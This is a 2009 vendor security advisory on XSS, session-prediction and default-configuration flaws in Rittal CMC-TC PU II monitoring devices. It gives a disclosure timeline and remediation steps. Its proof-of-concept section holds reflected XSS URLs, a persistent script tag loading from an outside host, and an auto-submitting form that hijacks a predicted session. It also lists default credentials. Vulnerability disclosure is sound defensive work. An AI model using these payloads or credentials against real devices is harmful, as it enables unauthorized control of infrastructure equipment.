-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Louhi Networks Oy -= Security Advisory =- Advisory: Rittal CMC-TC Processing Unit II multiple vulnerabilities Release Date: 2009-03-23 Last Modified: 2009-03-22 Authors: Henri Lindberg, CISA [henri d0t lindberg at louhi d0t fi] Application: Rittal CMC-TC PU II Web management Devices: CMC-TC PU II DK 7320.100 SW: V2.45 HW: V3.01, possibly other Rittal products Attack type : XSS Type I, XSS Type II, Session prediction, Remote command execution in default configuration Severity: Moderate Vendor Status: Vendor notified. Patch already available for XSS vulnerabilities. Other vulnerabilities will be addressed in a future version, no release date set. References: http://www.louhinetworks.fi/advisory/Rittal_090323.txt Overview: Quote from http://www.rimatrix5.com/ : "The Computer Multi Control Top-Concept (CMC-TC) from Rittal is a complete security management for preventive protection to guard against consequential costs, and is the central organisational unit for linking to the facility management. ... Processing Unit II (PU II) the nerve centre of the CMC-TC monitoring system. The PU II is the coordinator between the sensor unit and the network. It is configured via the integral Web server." Details: Several vulnerabilities were identified from CMC-TC PU II web interface. These include XSS Type I, XSS Type II, weak session management and insecure default configuration. XSS Type 1: ----------- Web application fails to validate and/or htmlencode user input when handling erroneous requests. This allows attacker to inject HTML and client-side scripts to victim's browser by creating suitable links. This vulnerability cannot be used for session hijacking, because CMC-TC PU II requires each valid request to contain current session ID as URL parameter. Requests without session ID are redirected to the login page. Therefore only phishing-type attacks or attacks against user's browser are possible. Successful exploitation requires that attacker can lure or force the user to follow the malicious link. XSS Type 2: ----------- Web application fails to sanitize and/or htmlencode user input on system information page. This allows attacker to backdoor the device with HTML and browser interpreted content (such as ECMAscript dialects or other client-side scripts) as the content is displayed always after login. Persistent XSS allows attacker to modify displayed content or to change the victim's password (since old password is not required for password changes). Succesful exploitation requires access to the web management interface either with valid credentials or hijacked session. Weak session management: ------------------------ CMC-TC PU II uses unixtime from login moment as session identifier, thus having insufficient randomization. If administrator login time is known and session is still valid, it can be brute-forced with relatively little effort. Proof-of-concept tool is provided, but any web application security tool (such as Burp Intruder) can be used for this. Successful exploitation requires that administrator login time is known (or a reasonably accurate guess can be made) and the session is still active. Insecure default configuration: ------------------------------- If default administrator password is not changed, attacker can run arbitrary commands and modify the system software by uploading malicious update scripts via ftp. See update packet script contents for detailed information about the update process (eg update_l.sh). Software update packet expects user to have default password in place, since ftp-upload script contains hardcoded default password. The update will fail with no errors if it's been changed. What makes this interesting is the fact that the device does not offer operating system level access through any of the other management interfaces. Telnet and SSH both offer a menu based administration interface. Successful exploitation requires default administrator password and access to ftp port of the target device. Remediation: * Restrict unauthorized network access to device * Change default passwords (instructions provided in Operation Manual) * Install patched Version 2.60a * Update future patch version as soon as available * Configure web interface to 'view only' * Review device configuration after an administrator has been let go * Do not follow untrusted links Timeline: * 2008-xx-xx Issues discovered * 2009-02-25 Contacted vendor via e-mail * 2009-03-02 Contacted vendor via e-mail * 2009-03-02 Vendor response. XSS vulnerabilities were already fixed independently. http://www.rittal.de/downloads/Software/de/CMC_TC/18_update_processing_unit2/PU2_Update_v2.60a.zip http://www.rittal.de/downloads/Software/en/CMC_TC/12_CMC_TC_Processing_unit/7320100V33e.pdf Quote from vendor (sic): "thank you very much by the security information XXS. We have seen, your customer has check the PUII SW V2.45. Actual we have a better Version 2.60a with more seyurity. Our XXS-Check of that Version is OK. If you has by the basic more information for Rittal, we are fine to get . " * 2009-03-02 Contacted vendor via e-mail requesting information about weak session management and public disclosure of XSS vulnerabilities. * 2009-03-02 Discovered issues regarding default configuration from update packages * 2009-03-16 Contacted vendor via e-mail requesting information regarding vulnerabilities and stating intent to release the advisory * 2009-03-19 Vendor response. Promises to patch vulnerabilities in a future version. * 2009-03-19 Contacted vendor via e-mail requesting release date for the update. * 2009-03-20 Vendor response. Release date not set. * 2009-03-20 Contacted vendor via e-mail stating intent to release the advisory. Delivered draft version of advisory. Proof-of-Concept: 0) XSS Type 1 / Reflected http://cmc.example.com/cmclogin.cgi?Fredo=%3Cscript%3Ealert('You%20broke%20my%20heart.You%20broke%20my%20heart');%3C/script%3E http://cmc.example.com/cmcget.cgi?46010%3CSCRIPT%3Ealert('I%20know%20it%20was%20you.');%3C/SCRIPT%3E 1) XSS Type 2 / Persistent Setup - General - Location: <script src="http://l7.fi"></script> 1234567890 is the unixtime for administrator's login. <html> <head><title>42</title></head> <body onload="document.backdoor.submit()"> <form ACTION=http://1.1.1.1/cmcget.cgi?630101011234567890 METHOD=POST name="backdoor"> <input name="p001" value="Initech Datacenter CMC-TC PU #42"> <input name="p002" value="Compton, LA county"> <input name="p003" value="servicedesk@xxxxxxxxxxx"> <input name="p004" value="0"> <input name="p005" value="0"> <input name="p005" value="1"> <input name="p006" value="0"> <input name="p006" value="1"> <input name="p007" value="1"> <input name="p008" value="04.02.2000"> <input name="p009" value="04:20:00"> </form> </body> </html> 2) Session prediction Proof-of-concept brute force tool available at http://www.louhinetworks.fi/advisory/Louhi_CMC-brute_090323.zip Other information: * Default username and password is cmc * Default administrator username/password is admin * Device supports following protocols TCP/IP, SNMPv1, SNMPv3, FTP, SFTP, SMTP, HTTPS, NTP, SSH, PPP, DHCP. Further research is highly encouraged. "Six pints of bitter. And quickly please, the world's about to end." -- Ford Prefect Copyright 2009 Louhi Networks Oy. All rights reserved. No warranties, no liabilities, information provided 'as is' for educational purposes. Reproduction allowed as long as credit is given. Information wants to be free. -----BEGIN PGP SIGNATURE----- iEYEAREIAAYFAknHdIoACgkQ3TZNEGeZkm51ywCgurXjibfo7YnVo4w42652m/9l BiEAoJcIyGDmjrM0ebS+6ZYL6sniQ+qR =ic2o -----END PGP SIGNATURE-----